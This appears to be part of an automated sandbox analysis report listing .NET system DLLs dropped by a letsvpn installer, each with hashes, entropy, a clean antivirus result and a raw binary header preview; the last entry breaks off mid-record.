                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.959275806967524
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CT+6ywnVvW0LW3hqWOHlLf2KQcvBZ9cFS+ShjmM6IGBkSKM:C99Yq3b2KZBZsS+ST6nkk
                                                                                                                                                                                                  MD5:BF4BDAAF7195B5677D6D287C757B1D35
                                                                                                                                                                                                  SHA1:E4AC328BF66A86A99E123F0C661D3A8C3EF51559
                                                                                                                                                                                                  SHA-256:B5B6C8C0B67D1633BFD6503E9827AEC7350697D0B035D855D5B942A04D52CE73
                                                                                                                                                                                                  SHA-512:E5EED64C20B17443965ECB09ADEE0E9F4DBB0ED15A6F8152C8DB674E92AE8E6891F333AEB2616D5FBC4B870DD23D9ADD8C4B8E8586E67879883BFB8A89B17A4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................Q....@..................................(..O....@.................. ....`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):88608
                                                                                                                                                                                                  Entropy (8bit):5.4435313555375915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i8KGCEPg1QqF3BhejEpvS/ZFQ+2/NVQ8GLa0Uh55T3lEC/IOPbZkxqN4bENZJlfI:lHCXBheNQ+2/NVQ8GLa0Uh55T3lEC/IX
                                                                                                                                                                                                  MD5:3E10881DC5ABA9ECC4364CC059BB8578
                                                                                                                                                                                                  SHA1:403F53E6A4275E4263B62A0EF251A36D4D8497DF
                                                                                                                                                                                                  SHA-256:EBD2D8C1D24C48D1B6A41819F7818C5449EC101857A9C55969B5378C43D9A362
                                                                                                                                                                                                  SHA-512:C1B8984D572D4B84F54249E145A4BF5400DE475598DC0F9094280A39A0B037475D2F59671257B27AE4FECA7332FCEF03646D8A382637F1B50C274AE2CC4BB7F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.. ...........?... ...@....... ....................................`..................................>..O....@...............,.. ....`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......*..............@..B.................>......H....... ,..$...........D....}...=.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948920609937838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1RbzriaXT+WlEW/hqWOHlLf2KQcvBZ9bNS+ShjmM6IGBkSd6C:H7iczq3b2KZBZPS+ST6nko6C
                                                                                                                                                                                                  MD5:9E2EDAE28E5C799121F9D0F05B761B39
                                                                                                                                                                                                  SHA1:98E324B6408BF42BA6E64728D3368E4BD4D5CDC9
                                                                                                                                                                                                  SHA-256:50665BD9288B3F7AC75F9691154CA6CEEC8C990E1BE2B2F34E96E09C597A8C8C
                                                                                                                                                                                                  SHA-512:EA993FAAC3545CAA30A005B915F7739586EDD8CADCD321C1F20A958559974D291A737F83A01E5EA7BF8C0BA20C08D40C05250536EFD875591DE9FFAD3B3CC605
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ...............................+....@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):150048
                                                                                                                                                                                                  Entropy (8bit):5.459404128686192
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:idYO+3m9R6e1x03BZ6bDSzZ8B0uAP+NfX/Y:o+2jv1x0ebezWiuzfA
                                                                                                                                                                                                  MD5:7E966799E708109C423A35B6E3340CF2
                                                                                                                                                                                                  SHA1:0AD32A3EAF26063B19FBF4F22F3EA3D8B49A2024
                                                                                                                                                                                                  SHA-256:70D32B4555F388CF4A63A63CF4048DD16CF5AFD27FCE888A19CEC2DD98641F88
                                                                                                                                                                                                  SHA-512:C3669AEC2EE69ACE5141C93059E0CDBC8D160EF53AB6BE7D019EAFCA40CCAF8AC3772D833CBCC17AD23CA4B6579B90DA0869E97A11CF111E330B525D88B2AC5E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ....................................@..................................,..O....@.................. ....`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83488
                                                                                                                                                                                                  Entropy (8bit):5.98305460524727
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZKsCikxiUPLkOWoYSAkm4fHLofFv9Rit9zzv5dnCsq3b2KZBZbS+ST6nkDL9:VfkxBIOYSq4/2biHrnCn3qKZ/mB9
                                                                                                                                                                                                  MD5:38D22AC2B692ACF76D92A78D6E7C3E70
                                                                                                                                                                                                  SHA1:73BDB1B25A805604E37DA7D97BBCDF0E18EEC6BF
                                                                                                                                                                                                  SHA-256:6A3A2B2EC8E6AD3CC8F0D13F74F4235F8B4655A369BCE8AE2EE6F2D333691FAA
                                                                                                                                                                                                  SHA-512:BA1226BE9B9BDAC47DD568C569AE2DDDCFF588070A25FF497CFA50591BF2DE00C27C04756BC56EC923AE50EFFF4D8B84A7745FBCFB583D4E92BBC0B48B710B2D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............&*... ...@....... ...............................z....`..................................)..O....@.................. ....`.......(..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........(...I..........0r..@...p(.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101408
                                                                                                                                                                                                  Entropy (8bit):5.839974107688984
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:q+kZKluk7ZFrtpAauVXrbtYC/xBu9L43qKj/mR:q+kzk7p4rbtYC/xBO4X/u
                                                                                                                                                                                                  MD5:17826E6B5B3FC50085AA80138A8718E6
                                                                                                                                                                                                  SHA1:DF573ABF9B431649FC0ED53DEBDF2E7FC3A9E270
                                                                                                                                                                                                  SHA-256:EF3D0790B048EA6A322743E69A5FDBD636B4034A2CB3CE988EA1B336E15D8EF6
                                                                                                                                                                                                  SHA-512:D5CAA4D0A5C7016B918C92FDFDFB619BD1CE98D71B7C9AB25983D1FD359460A44F4C64C94C241F18C805B1F10BAA134F57CA327ADA2D9302F8C5121D6AA6F769
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..R...........p... ........... ....................................`..................................o..O....................^.. ............n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............\..............@..B.................o......H........*...^..................Pn.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):225312
                                                                                                                                                                                                  Entropy (8bit):5.699948129437032
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:+XFpBZBJL3rBxad7/bAkGF60FhFoFmF8cjcsc4FEFbFgcbFmFiF6FhFuFBFuFDFz:OFRf60FhFoFmF8cjcsc4FEFbFgcbFmFz
                                                                                                                                                                                                  MD5:167F70DEA1E5182A5AB8A28413152050
                                                                                                                                                                                                  SHA1:E961CAE2EF1FD6B104F9699D32A0F7919D45ED5F
                                                                                                                                                                                                  SHA-256:0491ACB4AB821BF901A0BD9525B15640F6CFDC787E9F124D5A2F6D208D506C79
                                                                                                                                                                                                  SHA-512:0D70FA751AAD11A8929A373477A1F9B6B2D4792565952B95DE29D437C3CF49AE3511109F15E82C2C7B2BB65DE8C7BDEC677851C5DDAA8DAE2245A4F4B30A6ED4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..8...........W... ...`....... ...............................f....`..................................V..O....`...............B.. ............V..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H.......h7..............@...XW...U........................................*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%....(....*......(....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.926137740956502
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ARtRWjYWVhqWOHlLf2KQcvBZ9UFsS+ShjmM6IGBkSA:aipq3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:EADAE034DAA706B67962523E70B9413B
                                                                                                                                                                                                  SHA1:B066C495D1D0537E8FFBD25ADB8C4DEDF8AA2D84
                                                                                                                                                                                                  SHA-256:0C42D4083BCF4317F9758594D3707FCC9DB8E5C22671A58D533B18BF45B1ADF1
                                                                                                                                                                                                  SHA-512:A485F19ED60EE72EE6C697646C5DA34CAC7AE6EF97EF689AD5706C13E284901DC988BF77422DCC01866C8B1A771B5A4259E198E3185007CE6B7364EB608EE94C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................jm....@.................................x*..O....@..@............... ....`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9935188579764525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WeWnoWJhqWOHlLf2KQcvBZ9pM9S+ShjmM6IGBkSpqH:Wnpq3b2KZBZGS+ST6nk3H
                                                                                                                                                                                                  MD5:258B30BAD31A634788ADCE0968A95E69
                                                                                                                                                                                                  SHA1:13ED037797D8283CA176C3DB00E93B2182039D7E
                                                                                                                                                                                                  SHA-256:E5D1B116F6B5206463449683167E9ECCC3CFF8626BBE1CAAF7834C6355D27FDF
                                                                                                                                                                                                  SHA-512:3471F04AD313A453BE4AD8116D2CE6B2A2D32630348D906E48862D89F22C221CDB44F57BA87FED1E57D1DC7B7E95A1D9080B4D07793F48D800EC9F3C16D76F5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................X)..O....@..$............... ....`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.393304688632124
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wVdeQes+wUTHP0G3cmL+7NQ1OaY74E2q3b2KZBZaS+ST6nkw:wXeQes+wUTHPbANP7t53qKA/mC
                                                                                                                                                                                                  MD5:302C378EA0267FBD51A039D4CD3D61E2
                                                                                                                                                                                                  SHA1:41A362A72EF0C135C00521F8564DF35F41650995
                                                                                                                                                                                                  SHA-256:62FC2DD05AB95436C22A43A74C3C2DEFE3E4650F44830F4DA1732BE206EB4239
                                                                                                                                                                                                  SHA-512:F929BBF9CEDEDCD6013876752ABF3E04EC8AF4E303910F7B25864036711DAE4227FE78B057CC640DD6DA336CF3EB41CAA188E698EE92B3BF96400F9495A39758
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K............" ..0..N...........l... ........... ...............................O....`................................._l..O....................X.. ...........pk..T............................................ ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......<%...,...........Q.......j.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....( ...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958901473799381
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x6oWJjWehqWOHlLf2KQcvBZ9NY07S+ShjmM6IGBkSoy0z:x6v/q3b2KZBZo07S+ST6nkTX
                                                                                                                                                                                                  MD5:3DA8C454B5F9E5F3B22603C2B681BD33
                                                                                                                                                                                                  SHA1:08DECEF175B8D1F178953999274847DBAF0D03D7
                                                                                                                                                                                                  SHA-256:B67ED6607475FC7F7A69AC0C62241062A52DC5F831F3433ED760F52F1083F993
                                                                                                                                                                                                  SHA-512:1AAB49A79CCC903E7486C0848023225FFF445F1A1F1B0EE31BC609D9F6F9266809A1F372388E68ECD54CF8EBB35A44E9E4E9419AA9B815346305780E5DA3DCE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................y....@.................................H(..O....@..p............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43040
                                                                                                                                                                                                  Entropy (8bit):6.064632964448439
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FTyj5cKJfE+MJnnvnL0jxq3b2KZBZa89JtS+ST6nkeX:FTC5Ve0jE3qK7/mkX
                                                                                                                                                                                                  MD5:AF2D1149CA10620B40A349F6B67F82FD
                                                                                                                                                                                                  SHA1:39C24A88A8F6E26F4238DEE7D39266A30C9E315A
                                                                                                                                                                                                  SHA-256:E7402498B6412FABBD15287DE3792685617F2A1146014BE60AC40965652B2165
                                                                                                                                                                                                  SHA-512:5244D538995578C74CD656F79A65175AE60451DBCB3E0CB1F0F9E36A971A98AC31D8A5014871708F65C724A13CAF3814CA7ED7B5145F6F8EF38A37481CA9CC2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D..........." ..0..n.............. ........... ..............................?.....`.....................................O....................z.. ...............T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B........................H.......\&...5...........\...............................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.889108022269452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:pqk53/hW3fZ+zWt4hqWOHlLf2KQcvBZ91aiS+ShjmM6IGBkSgz:pqk53MJoq3b2KZBZnS+ST6nkX
                                                                                                                                                                                                  MD5:5E7BDFD79859F22E5D9F5DD5F026517E
                                                                                                                                                                                                  SHA1:A6618DC790291C2E4CF7C26C336EBCF33D619B88
                                                                                                                                                                                                  SHA-256:CA66E00B269BE8D63EF8CEA8BB04CB7E3D9AA9662B83ABF7FBEEC1D3CC912BA8
                                                                                                                                                                                                  SHA-512:F1EC165581CB09180C383F7F43FC1E084AE73CED9B2533016E444D04E4AA78A64233F8EAE3CF4708B8E53E5D422A2A4B12CDDA05517FC1E73ED5964E540953CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... .............................._.....@..................................)..O....@..0............... ....`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19488
                                                                                                                                                                                                  Entropy (8bit):6.776949657141779
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lFCc4Y4OJWfOWqWWOW1hqWOHlLf2KQcvBZ9o0S+ShjmM6IGBkSUA:nCcyCLq3b2KZBZ1S+ST6nk9A
                                                                                                                                                                                                  MD5:4CBEB58C5611362601BDC06540422F1D
                                                                                                                                                                                                  SHA1:D3CB8204EF113D8817DB547CE8EC36FD43CBCF5E
                                                                                                                                                                                                  SHA-256:F63B8FCF9EBE4C0344B5D95EE65ECF83850C8E55A2DD4280615EA0B8DEB92021
                                                                                                                                                                                                  SHA-512:3538E7F9B604D060A18E8556545F5FEC5F53D9348898556FAFF38126D3F10B7300A08650ED99323EED123449178C1E461E80D69CA5C2DE9806BDCA8E145FCB7C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ...............................O....@..................................-..O....@.................. ....`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9834026919899745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CAWxMWRhqWOHlLf2KQcvBZ9/UWS+ShjmM6IGBkSxK:CvFq3b2KZBZyWS+ST6nkuK
                                                                                                                                                                                                  MD5:A0CFB7229C44350D8B167F809BCC5C82
                                                                                                                                                                                                  SHA1:C7322697682880AE761D49FBD54523ECAB2DCDD4
